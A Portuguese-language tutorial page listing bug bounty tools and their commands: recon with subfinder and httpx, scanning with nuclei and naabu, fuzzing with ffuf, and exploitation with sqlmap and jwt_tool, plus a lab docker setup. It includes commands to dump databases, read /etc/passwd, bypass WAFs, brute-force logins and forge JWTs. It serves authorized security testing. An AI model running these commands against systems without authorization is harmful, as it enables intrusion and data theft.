Seguranca informacao
Tooling: arsenal do bug bounty hunter
Baixar PDFBurp Suite, Nuclei, httpx, subfinder, ffuf, Amass, sqlmap e o stack completo de ferramentas para offensive security e bug bounty.
Ferramentas não fazem o hunter — mas um hunter sem ferramentas é ineficiente. Esta página cobre o stack essencial, quando usar cada ferramenta e como configurá-las para máximo rendimento.
Stack por Categoria
┌─────────────────────────────────────────────────────────┐
│ BUG BOUNTY TOOLKIT │
├───────────┬────────────┬────────────┬───────────────────┤
│ Recon │ Scanning │ Exploit │ Auxiliares │
├───────────┼────────────┼────────────┼───────────────────┤
│ subfinder │ nuclei │ burp suite │ Interactsh │
│ amass │ nikto │ sqlmap │ ngrok │
│ httpx │ nmap │ ffuf │ notify │
│ dnsx │ nuclei │ commix │ tmux │
│ gau │ httpx │ xsstrike │ Obsidian/Notion │
│ wayback │ naabu │ jwt_tool │ Git │
│ shodan │ testssl │ arjun │ pentest-wiki │
└───────────┴────────────┴────────────┴───────────────────┘Burp Suite Pro
O Burp Suite é a ferramenta central de qualquer hunter. A versão Pro ($449/ano) é essencial.
Configuração essencial
1. Proxy → Options → Edit bind port: 8080
2. Project options → Connections → Upstream proxy (se usar VPN)
3. Scanner → Options → Scan speed: Fast (para bug bounty)
4. Intruder → Options → Number of threads: 10-50
5. Extender → BApp Store → Instalar:
- Autorize (teste de autorização)
- JWT Editor (manipulação JWT)
- Hackvertor (encoding/decoding)
- Logger++ (log avançado)
- Flow (visualização de requests)
- Param Miner (descoberta de parâmetros)
- JS Link Finder (extrair URLs de JS)
- Software Vulnerability ScannerBurp Suite workflow
1. Browser → Burp Proxy (interceptar tráfego)
2. Spider/Crawl → mapear aplicação
3. Repeater → testar endpoints manualmente
4. Intruder → fuzzing de parâmetros
5. Scanner → scan automático (Pro only)
6. Decoder → encoding/decoding
7. Comparer → diff de responses
8. Sequencer → análise de tokensIntruder payloads
# Sniper — 1 position, all payloads
# Battering Ram — 1 payload em todas as positions
# Pitchfork — payload por position (paralelo)
# Cluster bomb — combinação de todos payloads em todas positionsProjectDiscovery Suite
ProjectDiscovery criou as melhores ferramentas open-source de bug bounty.
subfinder
# Install
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
# Enumeração passiva
subfinder -d target.com -all -o subs.txt
# Com providers específicos
subfinder -d target.com -provider shodan,virustotal,securitytrails -o subs.txt
# Recursive (subdomínios de subdomínios)
subfinder -d target.com -recursive -o subs.txt
# Com API keys (~/.config/subfinder/provider-config.yaml)
# shodan:
# - SHODAN_API_KEY: xxxhttpx
# Install
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
# HTTP probing básico
cat subs.txt | httpx -silent -o alive.txt
# Com detalhes
cat subs.txt | httpx -silent -status-code -title -content-length -tech-detect -o details.txt
# Filtros
cat subs.txt | httpx -silent -mc 200,301 # status codes
cat subs.txt | httpx -silent -ml 500 # content length min
cat subs.txt | httpx -silent -fc 404,403 # filter codes
# Com screenshots
cat subs.txt | httpx -silent -screenshot -o screenshots/
# Technology detection
cat subs.txt | httpx -silent -tech-detect -tdnuclei
# Install
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# Scan básico
nuclei -u https://target.com
# Scan em lista
nuclei -l alive.txt -o nuclei_results.txt
# Por severidade
nuclei -u https://target.com -severity critical,high
# Por tags
nuclei -u https://target.com -tags cve,xss,sqli,ssrf
# Templates customizados
nuclei -u https://target.com -t /custom-templates/
# Update templates
nuclei -update-templates
# Com rate limit
nuclei -l alive.txt -rate-limit 150 -bulk-size 25
# Com output customizado
nuclei -l alive.txt -json -o nuclei.jsonNuclei custom template
# custom-template.yaml
id: custom-sqli-detection
info:
name: SQL Injection Detection
author: hunter
severity: critical
description: Detect SQL injection in search parameter
tags: sqli,injection
http:
- method: GET
path:
- "{{BaseURL}}/search?q=1%27%20OR%20%271%27%3D%271"
matchers-condition: and
matchers:
- type: word
words:
- "SQL"
- "syntax"
- "mysql"
- "ORA-"
condition: or
- type: status
status:
- 200
- 500dnsx
# Resolve DNS
cat subs.txt | dnsx -silent -o resolved.txt
# Com records específicos
cat subs.txt | dnsx -silent -a -aaaa -cname -mx -txt -o dns_records.txt
# Wildcard detection
dnsx -d target.com -wildcardnaabu (port scanner)
# Install
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
# Port scan rápido
naabu -host target.com -top-ports 1000
# Full port scan
naabu -host target.com -p -
# Scan em lista
naabu -list subs.txt -o ports.txt
# Com service detection
naabu -host target.com -sVkatana (crawler)
# Install
go install -v github.com/projectdiscovery/katana/cmd/katana@latest
# Crawl básico
katana -u https://target.com -o urls.txt
# Com depth e scope
katana -u https://target.com -d 3 -scope target.com -o urls.txt
# JavaScript analysis
katana -u https://target.com -jc -o js_urls.txtFerramentas de Fuzzing
ffuf
# Install
go install -v github.com/ffuf/ffuf/v2@latest
# Directory fuzzing
ffuf -u https://target.com/FUZZ -w /wordlists/common.txt -mc 200,301,302,403
# Com filtros
ffuf -u https://target.com/FUZZ -w /wordlists/common.txt \
-mc 200,301,302 \
-fs 0 \ # filter size 0 (empty responses)
-fw 100 \ # filter words 100 (generic error pages)
-o results.json -of json
# Parameter fuzzing
ffuf -u "https://target.com/page?FUZZ=test" -w /wordlists/params.txt
# POST fuzzing
ffuf -u https://target.com/login \
-X POST \
-d "username=admin&password=FUZZ" \
-H "Content-Type: application/x-www-form-urlencoded" \
-w /wordlists/passwords.txt \
-mc 302
# Vhost fuzzing
ffuf -u https://target.com -H "Host: FUZZ.target.com" -w /wordlists/subs.txt -mc 200
# Recursive fuzzing
ffuf -u https://target.com/FUZZ -w /wordlists/common.txt -recursion -recursion-depth 2feroxbuster
# Install (recurso de recursive scanning)
# https://github.com/epi052/feroxbuster
feroxbuster -u https://target.com -w /wordlists/common.txt -d 2 -o ferox.txt
# Com extensions
feroxbuster -u https://target.com -w /wordlists/common.txt -x php,bak,old,zip
# Com filtros
feroxbuster -u https://target.com -w /wordlists/common.txt \
--filter-status 404,403 \
--filter-size 0Ferramentas de Exploitação
sqlmap
# Basic detection
sqlmap -u "https://target.com/page?id=1" --batch
# POST request
sqlmap -u "https://target.com/login" \
--data="user=admin&pass=test" \
-p user \
--batch
# Com cookie de sessão
sqlmap -u "https://target.com/page?id=1" \
--cookie="session=abc123" \
--batch
# Dump database
sqlmap -u "https://target.com/page?id=1" \
--dump --batch
# Read file
sqlmap -u "https://target.com/page?id=1" \
--file-read="/etc/passwd" \
--batch
# Com tamper scripts (WAF bypass)
sqlmap -u "https://target.com/page?id=1" \
--tamper=space2comment,between,randomcase \
--batch
# Level e risk (quanto mais alto, mais testes)
sqlmap -u "https://target.com/page?id=1" \
--level=5 --risk=3 \
--batchJWT_Tool
# Install
pip install jwt_tool
# Decodificar
python jwt_tool TOKEN
# Testar algoritmo none
python jwt_tool -X a TOKEN
# Brute force secret
python jwt_tool -C -d /wordlists/rockyou.txt TOKEN
# Forjar token
python jwt_tool -S hs256 -p "secret" -I -pc sub -pv admin TOKENMonitoramento e Notificações
notify (ProjectDiscovery)
# Install
go install -v github.com/projectdiscovery/notify/cmd/notify@latest
# Configurar (~/.config/notify/provider-config.yaml)
discord:
- id: "bug-bounty"
discord_webhook_url: "https://discord.com/api/webhooks/xxx"
discord_username: "Bug Bounty Bot"
telegram:
- id: "bug-bounty"
telegram_api_key: "xxx"
telegram_chat_id: "xxx"
# Uso
nuclei -l alive.txt -severity critical,high -silent | notify -bulk
# Pipeline automatizado
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical -silent | notifyAmbiente de Desenvolvimento
VM/Homelab setup
# Docker compose para lab de testes
# docker-compose.yml
version: '3'
services:
dvwa:
image: vulnerables/web-dvwa
ports:
- "8080:80"
juice-shop:
image: bkimminich/juice-shop
ports:
- "3000:3000"
webgoat:
image: webgoat/webgoat
ports:
- "8081:8080"
sqli-labs:
image: acgpiano/sqli-labs
ports:
- "9999:80"Terminal setup
# tmux para gerenciar múltiplas sessões
tmux new -s bugbounty
# Split horizontal: Ctrl+B "
# Split vertical: Ctrl+B %
# Navegar: Ctrl+B + setas
# aliases úteis
alias recon='~/scripts/recon.sh'
alias nuclei-quick='nuclei -severity critical,high'
alias httpx-quick='httpx -silent -status-code -title -tech-detect'Referências
API Security: hacking de APIs REST e GraphQL
OWASP API Top 10, BOLA, broken authentication em APIs, GraphQL introspection abuse, mass assignment, rate limiting — segurança ofensiva em APIs modernas.
Cloud Security: AWS, GCP e Azure
Misconfigurações de cloud, IAM abuse, S3 bucket exploitation, SSRF para metadata, cloud enumeração — offensive security em ambientes AWS, GCP e Azure.